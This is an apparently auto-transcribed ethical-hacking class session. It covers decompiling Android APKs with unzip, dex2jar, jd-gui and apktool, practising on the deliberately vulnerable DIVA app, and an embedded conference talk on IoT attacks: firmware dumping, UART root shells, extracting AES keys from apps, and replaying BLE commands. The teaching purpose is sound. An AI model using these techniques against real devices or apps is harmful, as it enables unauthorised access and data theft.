command. So this unzip command will run in something like unzip with a hyphen small d to specify a directory name in which you want to extract the content, and then give the APK name which you want to extract this from. So for example, it can be like this command unzip hyphen d extracted from testing.apk. So basically what this command means is, I like to run the unzip command to create a directory called extracted, and using this unzip command in the directory extracted, unzip should extract the content, the zip archived contents from this apk testing.apk over here. Means if I simply run this unzip command with this flag hyphen d with the name extracted, I should be able to see that whatever content this testing.apk has is extracted into a directory called extracted, which if not exists, automatically gets created. So now if I cd into this extracted directory and do a ls-l inside this, you can see that there are these different files that got extracted from my testing.apk Android application. So please run this command and tell me if you get any error or anything. I'll just check the output for you. So if you are done doing this successfully, please type 1 in the chat. Okay, so as we have the contents from this APK file extracted, now the problem is that this APK file content has only been unzipped. The thing is, the problem with our APK files is they are compiled from a Java source code into Java bytecode. Java bytecode passes into a Java compiler. Java compiler passes into a DEX compiler, which creates this DEX files and all. So even if we unzip the content out of our APKs, the code inside these files might not be human readable. Let's say, for example, if I make use of my editor, so let's say I'll use my command line editor Vim, and if I try to open this Android manifest.xml file in order to see the content out of it, so what I can do is I can simply issue the command Vim, as in run the editor Vim, and open the content to show me the content inside this Android manifest.xml. So as soon as I hit enter, I should be able to see some non-human readable content. Means this, I can see that there is some content inside this, but it's not human readable, because the problem is it's still in the compiled manner. So if you get the same output, in order to exit out of your Vim editor, you'll need to carefully press escape button, then colon Q. You can see this colon Q I have typed at the bottom left of my screen. So first you have to press escape button, then type colon Q using shift colon Q. So shift colon Q to quit and exit out of this. So please try checking the content of this Android manifest.xml. I hope everyone else as well gets it in this non-human readable format. So you can press escape button and colon Q, a colon Q to exit out of your Vim editor. So the thing is, the content will not be human readable. So now we can see that from the extracted content, we have a DEX file as well. So basically this DEX file is the collection of those Dalvik executable contents which contains the actual APK content. So now what we need to do is basically, unlike your decompressing or unzipping the content out of that APK, now we'll need to use we'll need to use a tool called dex to jar to convert this dex content into a jar file. So to read the content from the dex file after unzipping, we need to use the dex to jar utility. So to read the contents from this dex file after unzipping the content, we need to basically use this dex to jar utility. So the way we use this dex to jar utility is by issuing the command d2j-dex to jar. Now let me confirm the syntax of the command: d2j-dex to jar. Yeah, d2j-dex to jar, and then give the name of this dex file. So basically the dex file that I have is named classes.dex. So classes.dex. Dex file name. So in my current example, the syntax is like d2j dex to jar for the file name classes.dex. So now if I issue this d2j dex to jar command, now you can see that basically my d2j dex to jar command converted that dex file what I had into a jar file. So now the thing is, if I use a utility like jd-GUI, so if I simply issue the command jd-GUI, what should happen is it should open this jd-GUI explorer for me. So after this open explorer gets opened, I can simply open this jar file, the file ending with this .jar in the extension, to read the content in this dex file. So if I simply open jd-GUI now, I have this coffee kind of icon, and in this I can simply go to file, open the file, and the file content which I need to open is inside this classes next to jar.jar file, which if I double click and open, now helps me to read the entire source code from that Java compiled application. That Java compiled application which I have for my main activity. So you can see all these different classes and everything related to your Android application package. So if you go and check each and every classes, you'll see whatever code is there inside that. So this should basically help you read that code inside that different classes inside your Java application. So if anyone is not able to read this content, please let me know in the chat. I'll check what's wrong in the system. So these are the commands. So please run them and see, are you able to get this to content to be read or not? If not, please let me know in the chat. I'll check your system and fix the issue for you. So once you're done, please let me know in the chat.
Sarji?
Yeah, yes, sir.
Sir, I got that GUI part and I was able to see those code, but in the
Okay.
yeah, but I'm not getting these messages like.
You can ignore the messages. These are warning messages. It's okay.
I'm not getting anything as such. Like in that case, only JD-GUI, I get that particular an application wherein I will be able to read through all those codes. That's
Okay,
what I
let me.
was able to see.
What's the commands?
Okay. This is what
Yeah, this is what we
I.
wanted. There's no worry.
Okay.
There's no need to worry about warnings and other things. So this is what we wanted. So
Okay.
if you simply click on any class name, the code inside that should be shown to you.
Right.
So you can click on the main class name like payload. You can directly click on that main class name as well. Yeah, they should show you the entire code inside that.
Okay.
The same way, if you click on any other class name, it should show you the code inside those other class names as well.
Sure.
Okay, so let's close it.
Yes, sir. Yeah. Thank you.
So now this like this part after it has concluded, now what we can do with this source code after we have gotten this. So basically the thing is, in order to perform more tests or more rigorous testing, we need to have a little hold or a little catch on our Java related things, Java related stuff, as in we need to know some Java programming and everything. So now let's discuss what this OWASP top 10 related to your Android applications is and how it can be helpful if we have a source code like this in our hands. So now if we simply go over and one more part is remaining. I forgot to show you that part. So the usage of this APK tool we did not see. So the thing is, if you remember that if I simply do ls-l, here's my extracted directory. Yeah, I have my extracted directory. So if I cd to my extracted directory, I was not able to read the content inside this XML file, right? So the thing is, if I want to, then I can use this utility called APK tool. So what this APK tool can do is, instead of unzipping, it can decompile an Android application for me. So let's say, for example, if I want to decompile, not unzip, decompiling is different, unzipping is different. If I want to decompile the code from this APK file, what I can do is I can use this utility called APK tool, ask it to use a flag -d, that is for decompiling. Decompile what? Decompile the content of this testing.apk. So if I use this APK tool command and give it this output apk tool -d, sorry, it will be with a simple d, not -d, it will be with a simple d. APK tool d, as in d for decompile. APK tool decompile the content of this APK file, simple APK. what it should do is now it should create a directory with the same name whatever I have for the application. So if I do a cd to this testing directory now and do a ls-l over here, you can see a different content being decompiled, not unzipped, as in it's not unzipping now, it's decompiling the code now. Basically, if it's decompiled now, I should be easily able to go and read the content inside this. Like let's say if I now open this Android manifest.xml file with the Vim editor, I should be able to see the content inside this, what I was not able to see earlier. Like this. So now I can see what kind of permissions will my APK have once it's installing on a phone or anything. Again, I can press :Q to quit or exit out of this. So this decompiling is something different and unzipping is something different. So for decompiling, you need to basically issue this apk tool d command in the same location where you have this testing.apk directory or testing.apk file. So please make sure that you are able to decompile this application as well. So once you have decompiled it, please let me know in the chat. Then I'll discuss some more theory parts. Okay, so I hope all are done until here now. Okay, so now let's go and see what OWASP top 10 related to our mobile platforms is. So if you simply Google this word OWASP top 10 mobile, not mobile, it's mobile. So for this OWASP top 10 mobile, you'll be able to see this official documentation of OWASP top 10 on the OWASP website as well. So either that or this AppNox blog, anywhere you can go and see things related to this OWASP top 10 related to mobile platform. So now in order to understand how these all work, basically we need to have something to work with. Like for learning our web applications security part, we had our DVWA web application, the damn vulnerable web application, or we can make use of our OWASP broken web applications project and everything. So similarly for learning these kind of things, there's a company called Payatu and they created an APK called Diva. So if you simply Google this word Payatu Diva app, you will see that this Diva app download will be available to use. This Diva the term stands for damn insecure and vulnerable app. So this Diva app is basically something like that DVWA web application, which can help you learn the aspects of your Android applications security. So basically this APK is a compiled application which has set of these different OWASP top 10 vulnerabilities inside the package. So there are like different resources available on internet where you can go and learn how to work with this application and things. So this blog, Resources InfoSec Institute blog, is one good blog among that, where you can see how you can set up this application and everything. So one more interesting place where you can learn this is a YouTube tutorial. It's a YouTube tutorial. So if you simply go to YouTube and search for this term, Android pen testing by tutorials point. You will get this entire playlist which will teach you the parts of Android pen testing. Oh, sorry, tutorials point. I'm typing UW. Android pen testing by tutorials point. So this is like one good playlist which you can see and learn your Android pen testing things about. So if you simply go through this entire
Have you
playlist,
ever noticed how some
I'll not go through the entire playlist. I'll show you the important parts. So first part is in this app development lifecycle. This guy explains how that concept of what I was telling related to your Java source code being fed into a Java compiler to convert it into a Java bytecode, then passed on into a Dex compiler to convert it into a Dex bytecode or a Dalvik bytecode, and then create a text file out of it, which gets packed or zipped into a APK package works. So basically what we did was we worked the reverse way around, where we first of all got the Dex file after unzipping the content of our APK. Then we use that Dex to jar to basically convert that Dex into a closest Java source code which we worked with. So in the same way, this guy in this YouTube playlist tutorial will tell you how you can set up your own Android pen testing lab using a special operating system called Sentoku. So this Sentoku is basically a sorry, Sentoku OS, not Sentoku knife. Yeah, this Sentoku Linux is basically a mobile forensics or reverse engineering related OS. So basically, it's like more focused on things related to your mobile forensics, mobile security, mobile malware. So it has those different set of tools. So basically, what this guy does in this video tutorial is he in the next set of steps tells you how do you set up this Sentoku environment in your home, and instead of using this BlueStacks kind of emulators, because many a times in order to work with this emulator kind of things, instead of using this BlueStacks emulator, there's one more emulator called Genie Motion. So this Genie Motion is like one more emulator which you can make use of. This Genie Motion is available readily for your Linux systems, Mac OS, and your Windows systems as well. So basically, in this Genie Motion, what you can do is you can create your own emulated Android environment, basically with whatever kind of API level you want for your Android phones, whatever kind of phone model you want to replicate. There are different versions of phone models available and all. So, like let's say for an example, I want to emulate one Android phone having some API 4.4 and let's say some custom phone with 4.4 API. So what I can do for that is I can simply select that phone with the API level, click on next. So basically what this Genie Motion will do is it will download that APK related, sorry not APK, the environment related thing for that phone and will emulate that environment for me. So in this case right now you can see that for this custom phone model that I selected, it's basically downloading that and it uses VirtualBox on the backend. So basically once this part is done, this Genie Motion will emulate that Android phone for me on my current system. So I'll just wait for 1 more minute so that it can finish downloading and setting that VM up so that I can run and work with that VM. So like this, you can even choose the latest version of different phone ROMs or builds so that you can work with that. So if your system has good enough RAM and CPU capability, it can emulate more better versions of your Android devices as well. You can see that it has already installed this device. So if I need to simply start this, I can select this device and start it over here. So once it gets started, basically what will happen is my Genie Motion will automatically emulate a Android device in front of me over here right now. You can see that this part is emulating and starting that virtual device for me. So this is like a more feasible setup if you are going to perform your pen testing on your Android applications or Android platforms and everything. So once this phone model gets booted up and everything, I'll show you some more parts. So right now it's emulating the 4.4 API, which is a very old one. So if you want, you can emulate a newer API level like 7, 8, 9 as well. Just give me one moment. Oh, sorry, I clicked that burp suit by mistake. Come on, start. Yeah, it's already started. So now you can see it's emulating that 4.4 API level for me. And I have this folder kind of interface where I have the entire menu read to my Android phone, which I can work on with and perform my pen testing. So with this Genie Motion, you have the advantage of having the ADB or Android debug bridge installed on this by default. So what that ADB or Android debug bridge helps you work with is you can always acquire a shell of this basic, you can say, this Android phone at any point of time using that Sentoku or your basic Kali Linux VM if you have your ADB installed on your Kali Linux as well. So in this part of the video tutorial series, so now I'm just going to stop this machine, stop this emulated Android device. So let me just close this one first. Yeah, Genie Motion closed. Yeah, so let's get back. Yeah, so in this part, after setting up this Android pen testing lab and all, this guy will tell you how it can be used in order to, you can say, connect to that ADB, Android debug bridge and everything, the setup steps for connecting to that using this Sentoku VM, what kind of networking settings, things to do and all, how to set up this ADB, Android debug bridge. So with that, how can you acquire the root shell or shell of that emulated Android device at any point of time? How does this ADB work and all? And then after running, understanding all of this, many a times we'll always need to use the concept of proxying because many a times the applications that we work with are also using SSL. So in this kind of cases, what this emulated Android device can do is the Sentoku VM or your Kali Linux VM can run this or you can say set up this part of Kangya. Yeah, traffic analysis and interception. So in this part of this video, you can see how you can set up burp suite to intercept for proxying the connections between these two emulated Android devices and your Sentoku VM or Kali VM as well. So with this, what you can do is for SSL related traffic, which your apps might transfer, you might be able to work with that and understand the part of how to intercept those communication if it's happening over HTTPS as well. So just let's see one part of this video tutorial series where we have that Diva already up and running in that emulated Android device on that what we want to call our emulated Genie Motion virtual machine. And in this Diva application, we'll see the part of how this first part of insecure logging for application works. So let me play this insecure logging video out for you and then we'll discuss this part.
Security issue of Diva, that is insecure logging. So what is insecure logging? Before talking about it, let's talk about a normal scenario. So here our Android application may store some data as logs. So what happens is in Android, all logs of all the different applications are actually stored in a central position where all the application can store their logs. So what happens is if there is one Android application and that Android application is actually storing user sensitive information, that information might be auth token, session ID, or cookies, even usernames and password. And if that application is storing that sensitive information and logs, then what another application can do, another application can also access that log and can steal our information. So this is in the case of insecure logging, where our application stores something sensitive information in the logs and other application can also access that logs. But what happened is in the latest version of Android, permission for accessing that central repository where our Android saves logs is totally changed. But here in this issue, our motive is to figure out that what is being logged in Deva. So let me give you one scenario. So you can see here is our application Deva. So our application is actually storing something in this logs. So what another application can do, just for example, here is our malicious application. So this malicious application can also access this central position and can steal our information. But now let's see that what kind of issue is this in Deva. So you can see here, this is how the first issue looks like in secure logging in Deva application. So you can see here, our objective is that we have to find out that what is being logged by this application, and we have to find out the vulnerable code. So if you look at this challenge, it's just writing here and it's just asking us that we have to write our credit card number and we have to click on checkout. So if we add here our credit card number and if we click on checkout, now let's see what actually happens if we click on checkout in our system. Now let's see that how exactly insecure logging issue is in Deva. So you can see here that our Genymotion is up and running and here is our application Deva. So let me open it up. So you can see here that its first issue or a first challenge is actually insecure logging. So let me open it up. So first of all, we'll go through the objective. So our objective is that we have to find out that what is being logged and where. Means, as I told you earlier, that in insecure logging, what happens is our Android developers ends up storing user sensitive information as logs. So in this issue, we actually have to find out that what is being logged by this application. Now let's try to play with this issue. So you can see here that it's asking us for entering a credit card number. So let me enter anything and let me click on checkout. So you will see here that we got an error that error occurred, please try again. Now we have to figure out that what is actually being logged by this application. So before we proceed, first of all, we will analyze the source code of this activity or source code of the security issue. So let me go inside my CentOS operating system. So you can see here that on my desktop, I have one APK file that is devabeta.apk. Well, there are different ways in which you can analyze the source code. Like you can also reverse the file by using APK tool JDX. But here, I'm not reversing the file, where I just unzip the content and then I will convert its text file into a jar file, and then I will analyze that jar file with the help of JDQ. So let me go here on my desktop. So you can see here one APK file devabeta.apk. So let me unzip the content in deva directory. And let's go inside that directory and you will see one file called as classes.dex. So let me convert this file. So dex to jar, classes.dex, hit enter. And you can see here that it has started converting this dex file into exactly a jar file, that is Java archive file. Okay, so you can see here that we got our Java archive file and now we will analyze this file with the help of JDQ. So let me open JDQ and now let me pass this file. And let me expand this up. And you can see here one package name called jaka.asim.deva. So let me expand it up. And here on the left hand side, you will see a lot of activities. And if I open any activity, like our activity is actually a log activity. So if I open it up, you can see its entire source code. So this is the activity which is actually responsible for storing our data as logs. So now let's analyze its source code. So you can see here that what's actually happening is there is one function called as checkout. So this function is called whenever we click on this button, that is checkout. So you can see here that what actually happening is it's actually storing something in logs. You can see here log, and it's our log name is deva log. So this kind of error we see, error while processing transaction with credit card. And what it's actually doing is it's actually adding our user sensitive information, that is our credit card, as in logs. Now let's try to actually see that what is being stored in logs. So what I'm going to do is, first of all, we will find out the process ID of this application so that we can grab for that process ID in ADB logcat. So let me go and write down here ADB shell ps, and I'll grab for Deva. So you can see here that this process ID is 2516. Now let's try to do ADB logcat. Now we will grep for this particular process ID, that is 2516. And you can see here that we are able to find out its logs. Now let's go back to that issue and let me open that up. So let me enter any credit card number here. And you can see here that if I click on checkout, this application has actually stored our credit card number as logs. So you can see here, error-wise processes transaction with credit card this. So as I told you earlier, if any Android application is actually storing user-sensitive information in logs, that's another security issue. So this is how this issue is actually storing our information. So it's not a good practice to store user-sensitive information in logs. So that's why this issue was in Diva to demonstrate or to explain to the users that why it's not mandatory or it's not necessary to store user information in logs. So in this video, we talked about that what is insecure logging and how insecure logging works in Diva. So thanks for watching this video.
So this was like the case for this insecure logging.
Do you want to learn to draw?
Okay, so in the same way, like with this insecure logging, you have other set of vulnerabilities also, which the guy in the playlist discusses and shows you for the real time demonstration of this different top 10 vulnerabilities related to in mobile applications. And at the very last, he tells you related thing related to this browser security framework, which can do your dynamic runtime analysis, as in many a times or or at many points of time, there might be chances or there might be places where a user might require doing things in actual application runtime. So in those kind of cases, how this browser security framework, setting up of this browser application framework and all can help you achieve that content or context of doing the dynamic runtime analysis of these applications and everything as well. So this is about this playlist thing. So please have a look at this, and there are some other different tools that you can use. So basically, in order to safeguard yourself from these different types of attacks related to things and all, so there's like one video which I wanted to show related to two tools from a company called Zimperium. So one tool is called Z-Anti. So if you check for the video for Z-Anti from Zimperium, Z-Anti tool from Zimperium. So this Z-Anti basically is a you can say pen testing application that you can install on a rooted Android device. So there's a video related to this Z-Anti as well. Let's see that Z-Anti's video, and then I'll tell you how a tool called ZIPS helps you defend from these kind of things as well. So this Z-Anti's demonstration, let's see this part over here now. So basically, what this ZANT tool does is it emulates the entire pen testing framework where you can perform different type of attacks like your man-in-the-middle attacks, just to phish usernames, passwords, replace images, do scans on the network to identify different vulnerabilities, report them to a central server, or you can say you can add your mail accounts to just upload those reports and everything whenever this is happening. So this ZANT tool, like developed by this Zimperium company, they have also created one defensive tool called ZIPS, which they give free of cost. So the ZIPS tool, if these kind of attacks are happening on your network, will help you basically identify these kind of things happening. So there's a video related to this as well. This will be the last part of the video that we see now. So hopefully they have a video for this as well. No, they don't have a video for this. So basically what this ZIPS tool can do is any point of time someone is performing any kind of thing, like let's say you can see whenever someone is performing or starting a man in the middle attack or doing any other thing. So in these kind of scenarios, these ZIPS tool will help you effectively find out all these kind of things. So it's something that is like your related to IBM Mass 360 kind of thing. So this IBM Mass 360 is something like that, device endpoint security. So basically what these do is these companies which help you enable these BYOD solutions, like whatever people can bring for the part of their own devices added into a network. What these unified endpoint management tools will help you do is they'll help you achieve the context of which all devices are connected, which among them are rooted, which among them can do something malicious, which of them are among Android, which other things and all, everything like that as well. So these Mass 360 and this ZIPS are like such kind of tools which one can incorporate in a you can say a trusted environment, like you can say company network infrastructure scenarios where you can help these use the help of these kind of solutions in order to identify the current threats that your organization might incur or things related to that. So you can just see demonstrations related to this IBM Mass 360 related to things on YouTube, or just try to read some article related to this. So this is the part that we had in context of our hacking Android or hacking mobile platforms and device security and everything. So let's take a break for like 15 minutes and we'll resume around 12:15 time. And then we'll start with the part of our hacking IoT platforms and everything. So let's resume at around 12:15 and then we'll resume with the part of our hacking IoT platforms. Okay, so I hope you all guys are back. So let's start again now. So the next part that we'll see will be related to our hacking IoT platforms for the theory part discussion. So this module is an entire theory module which is like a new module that has been put up by our EC Council. So we'll just go through some presentations or some videos and then discuss about the same thing related to our hacking IoT platforms. So there's this YouTube video related to this hacking IoT platforms which I'd like to play first, and then we'll like to discuss things related to this hacking IoT platforms. So you can Google the same name. The guy's name is Aditya Gupta, and you can search for his video related to IoT exploitation. So in this video, this guy basically like discusses the aspect of the IoT security entirely. So the thing is, you can correlate these all things when you go through your slide in your or PDF file in your Aspen account for your CEH EC Council thing as well. So I'll play the video and pause it at some points of time where we can hopefully discuss this aspect related to our IoT security and everything.
Is ready to give his talk. Let's all come back here if we can and give him the attention he deserves. All right. Okay, so good evening, everyone. Welcome to the talk on IoT Exploitation 101. So this talk is going to be something like a very, very short crash course on how you can get started with IoT security. How many of you guys already have looked into some kind of security of IoT devices? Okay, 2 of you. Yeah. And how many of you think that IoT devices are secure? Okay. Yeah, as long as they are unplugged. Yeah. So my name is Aditya. I run a startup called Atify and another one called Security School. We specialize in IoT and mobile application pen testing. I've also written a couple of books, like one on Android and the other one coming next month called IoT Hacker's Handbook. And I've spoken at a bunch of conferences like Black Hat, OS AppSec US, and a couple of others, and worked through a number of different security and developer roles in the past. So one of the courses that I teach is offensive IoT exploitation. And I've been doing this for the past, I think IoT for the past 4 or 5 years. And I have noticed a trend between all the speaking sessions and the training sessions. So people 4 years back, they had this notion in mind that IoT devices should be secure, both the developers and the people like executive audience. But these days, like as you can see, everyone knows that IoT is not secure. Maybe you have seen some hacks in the past. Maybe you've heard of Mirai botnet or any other attack on IoT devices. So the current present day IoT security is like web security back in 2001 or even before that, when almost everything that you touch has a number of security vulnerabilities. How many of you have heard of things like OWASP, broken web application, or DVWA? Almost everyone, right? So they are vulnerable platforms. Now, if you take any IoT device, most of them are vulnerable platforms. So you can try as many vulnerabilities as possible on these IoT devices. So this is a vulnerability, or this is the decompilation of an Android application for a medical device utility. And all, as you can see, like all the encryption was happening with a password called Bob the Builder. So once you get this password, all you need to do is maybe sniff the communication, use this to reverse or decrypt the packets, which is also something that I'll be showing today. And then another thing happened recently. How many of you guys saw this? Dishwasher had a directory traversal bug. And yeah, so once you have the dishwasher connected to the internet, all you need to do is run a traversal attack, maybe get the admin credentials or any other sensitive file on the file system, and maybe start the dishwasher or make it part of a botnet, do whatever you like. So we have seen a lot of different vulnerabilities. Now, if you look at the entire IoT ecosystem, starting from the end user to the all the cloud ecosystem, all the mobile application, radio communication, which particular layer do you think is vulnerable to attacks? All of them. So you have a number of mobile application vulnerabilities, a number of web and cloud-based vulnerabilities, radio communication vulnerabilities where you can hack things like Zigbee, Z-Wave, 6LoWPAN, all of that. And then at the end, you have hardware level vulnerabilities like URSP. And these are some of the things that we'll be discussing in this talk along with the demos. So what is Internet of Things? I think everyone is aware of what exactly it is. So any device that you think is communicating with any other device or collecting data, have a bunch of sensors to maybe monitor things and all of that. So everything comes in Internet of Things. There are a number of different names for this Internet of everything, whatever people like to call it. There's also another name for it called insecurity of things, because most of these devices are already insecure. And these days, the basic principle behind creating IoT devices is anything that is there, just put a chip on it. Just because it is possible, a product will exist. So anything ranging from like smart x-rays, smart glasses, smart bottles, all of that will exist, like already exist. So this is one of the popular Twitter handles which you can follow if you want to stay updated with all the different things which are currently happening. So Internet of Shit. So this particular handle tweets about all the ridiculous things which you can have with the IoT ecosystem. And this is how currently smart homes or smart enterprises look like. So you buy a number of smart devices and you're prepared for security holes everywhere. Later on, I'll also be discussing, or I think, yeah, after a couple of slides. So the way you start looking into IoT security, and this is the very first thing that you do, and maybe some of you are already aware. How many of you know of Shodan.io? Yeah, good amount. So Shodan.io is a search engine for a number of things, including Internet of Things. So anything that is probably connected to the internet and something that you can also access remotely, you might end up finding it over here. So you can search for a number of things like industrial control systems, dishwashers, refrigerators, toilets, toothbrushes, all of that. It's really funny, like do this exercise, go back to home, go to Shodan.io, anything that comes to your mind, just search for it and you'll end up finding something. So one particular guy actually found a truck parked somewhere and it had the default credentials, admin, and he was able to actually move it. And I also, like, while I was doing a pen test, I had this target of breaking into an enterprise through like everything possible. And I found this smart coffee machine, which a lot of people have in their home these days. And this smart coffee machine uses a number of technologies like Wi-Fi and BLE, comes with a mobile application. Everything looked good at first, but as soon as you started sniffing the BLE traffic, it kept on emitting the Wi-Fi credentials every couple of seconds. And the enterprise had it on the Wi-Fi network. So yeah, so you get the Wi-Fi credentials, connect to the enterprise's Wi-Fi, and the game is over. Yeah. So sniff Wi-Fi credentials over BLE, and sniffing BLE is something like really trivial. So you can get a Ubertooth or get a Adafruit BLE sniffer, start sniffing all the packets, and yeah, even these kind of vulnerabilities were found in things like Fitbit, and also a number of other vulnerabilities. So they had all your info like collected and also uploaded it to the server insecurely, including a lot of personal information. So, yeah. So what does IoT consist of? Firmware, hardware, software, radio, and cloud. And the way to pen test IoT devices is to look into each of them separately and then figure out how these different components interact with each other. So we'll start off with firmware and we'll later on move to the different aspects, and we'll have like individual case studies and demos in almost everyone except the firmware, I guess. So yeah, so firmware, if you're not familiar with the term, it's pretty much any kind of code that runs on the device. Yeah, almost any embedded device that you see will have a firmware on it. And there are a number of ways to get hold of the firmware. So one of the ways is get access to the device, open up the device, look at the circuit board, figure out ways or figure out the storage place, like maybe an SPI chip or maybe a NAND chip, and dump it from there. or maybe while the device is updating, you can sniff the firmware, have it stored somewhere, or what could be some of the other ways of finding the firmware? Exactly. So in some of the cases, you'll actually find the firmware on the vendor's website. If not directly on the website, maybe in the community or support forums. So yeah, that is one of the ways in which you can get access to the firmware. And once you have the firmware, look at the different binaries inside it, look at what kind of vulnerabilities they have, maybe command injection, maybe buffer overflows, all those sort of vulnerabilities. Also, another interesting thing with firmware is, let's say you want to start IoT security research, you don't have the device yet. So all you need to do is get the firmware and emulate it using tools like QEMU. Anyone has done it before? Use QEMU? Okay, one guy in the back. Yeah, nice. So all you need to do is get QEMU for that architecture, and you can run that firmware, and you'll have the IoT device sitting on the network, even though you don't have the physical device. So you can perform all sort of network-related exploits on that. Maybe do even like live real-time IDA debugging, those kind of things. So yeah, also once you have the firmware, use tools like binwork, which automatically extract the file system from the firmware, and you have the entire Linux image. Look for different things such as so look for different things like configuration, private keys. In most of the cases I've seen, like they have their private certificate, all the API keys stored in the firmware, just because the developer doesn't realize that anyone can get access to the firmware. So yeah, firmware is one of the really interesting places to start looking at if you want to find vulnerabilities in IoT. And another technique that you can use is you can get two different versions of the firmware, simply do a diff, figure out what has been patched, and you now have a exploit, even though that particular vulnerability has not been published for the previous version. Then you can also do things like ARM disassembly or MIPS disassembly based on what architecture the firmware runs on. Along with QEMU, you can also do things like attaching with GDB or attaching with IDA. So if you are interested in reverse engineering, you can do all of those things with a firmware, even if you don't have the device. So moving on from firmware, let's actually get to the core of IoT. So hardware hacking, and this is like the most interesting thing that I do. So as soon as I get the device, I open it up, look at all the different interfaces, look at all the different chips, and figure out like what all can I possibly do with this. So most of the devices that you see, if they have things like Wi-Fi or any kind of radio communication, you'll find an FCC ID written somewhere on the back of it, or maybe beneath something, or in some cases it might not be there. But chances are you'll end up finding the FCC ID. Anyone knows what an FCC ID is for? Yeah. Right. Exactly. So it's an identifier for any device that ships in the US and has radio emissions, which almost all the other devices are. And just by the FCC ID, you can get the internal pictures, you can get the circuit pictures, you can get the frequency of the device, like where it operates. So if you're planning to do things like radio hacking, you know the exact frequency where you need to attack it on. So just find the FCC ID, go to fccid.io, enter the ID, and you'll end up finding like a ton of information. And sometimes the vendors even fail to like ask for a confidentiality report for the schematics. So that's like the most stupidest thing I've seen. So once you have this device, start with FCC ID, open up the device, and the first and the most easiest thing you can do is do UART exploitation. So this involves looking for UART pins, which are typically like 3 or 4 pins or pads on the device, and all you need to do is connect it to a FTDI cable, and what you'll end up having is most probably an unauthenticated root shell. So I've connected the device to my system. Just speed it up. So this is my device connected at def/tty/usb0. I find out the baud rate of the device, at what particular baud rate the device operates on. And if I see something unreadable, that is the incorrect baud rate. So if you see something readable, that's the correct baud rate. And once you find out the correct baud rate, all you need to do is run minicom. And this is what you'll have, an unauthenticated root shell on the device. So you can change things like TFTP configuration, you can get access to all the files, change configurations. Yeah, pretty much anything that is possible on the device. And these UART pins are pretty easy to find. Apart from UART, there are a number of other interfaces which the hardware devices operate on. So you can look for things like SPI, I2C, and JTAG. And similarly connect those particular individual pins or pins for that particular interface. And we've also written a tool called Add5 Badge tool, which is free and open source. So once you have connected it to, let's say, SPI, all you need to do is click on read and run, and you have the entire firmware dumped from the device. In this case, we dumped SPI dump.bin, which is the entire firmware, and you can see by running binwalk that now you have the full file system of the device. So hardware exploitation, if you have not done it any time earlier, it might be a bit complicated to start, but once you figure out what exactly to look for, it won't take you more than a couple of days to get started and hacking like everything which you have at home. Yeah, it's pretty addictive, and it's not a good habit because you'll end up like. So now we move on to mobile application security, and this is pretty common. Like mobile application has a number of vulnerabilities from like whenever mobile application started. And I'll just give you a quick demo of what kind of things you can find with the mobile application. So here is a Smart Plugs mobile application, which is smartwifi.apk. So this one. So this is a Smart Plug mobile application, and you can use the mobile app to control, like turn on the smart plug, turn off the smart plug. And all you need to do is so I ran an Android application decompiler called JADX, which will decompile all of this to Java files. And once you have the Java files, you can go inside the folder name. And in this case, it was a Chinese smart plug. So Hangzhou ZX. And if you open up the file called preferences.util.java, you'll have the firmware download URL. So you get the firmware download URL from here, get the firmware. And once you have the firmware, you can go on to find more bugs. And also another interesting thing in this same mobile application was it was pretty secure. Like if you looked at it normally, it looked pretty secure. It used AES encryption. And the AES encryption was actually in one of the libraries. You simply unzip the APK, go to the libraries, take that library, open it up in IDA Pro or Hopper, start analyzing the ARM code. So in this case, there was a function called encrypt data. And there's also a function called AES set key. Look at the different registers, what kind of values they are holding. And if you start analyzing the registers and the values, you'll end up finding, in this case, the AES key, which is this particular string. And once you have the AES key, you can pretty much do anything that you want. So I had the communication captured, and this is the Wireshark packets, wrote a AES decryptor, and you can figure out the exact command the mobile application is sending to the device, or the device is sending back to the mobile app. So pretty much the same conventional approach that you use to pentest, apply it in a IoT ecosystem. And once you also figure out what kind of commands are being used, you can simply take over the smart plug. So give it the command on, it will turn on and off even without any kind of authentication. So that was all about mobile application, and web is pretty much in a similar way. So all the web application security bugs that you keep on finding, apply the same to IoT ecosystem. Moving on to radio exploitation, this can be a bit tricky because you'll encounter a lot of unknown protocols such as Wi-Fi, BLE, Zigbee, 6LoWPAN, all of that, and you might require different set of hardware and software to deal with all. Right? So, for example, BLE, you might need Ubertooth. For Zigbee, you might need RZ Raven and all of that. But the process of doing exploitation is the same. So you start sniffing, start analyzing the packet captures, reverse them, and try to replay it. So that's pretty much the whole process in which you can exploit smart bulbs, smart lights, smart locks, all of that. So this is something that we did with BLE. So we started with sniffing the bulb, and as soon as we sent a write request to the bulb, like changing color, we saw how the packet looked like, and we figured out the handle and the value. So handle is where it is being written, the value is what the value is being written. And once you figure out these two properties, like these two characteristics, all you need to do is just write up a Python script. In this case, we wrote a Python script to change red, green, and blue. And as soon as you ran it, the bulb will automatically start changing colors.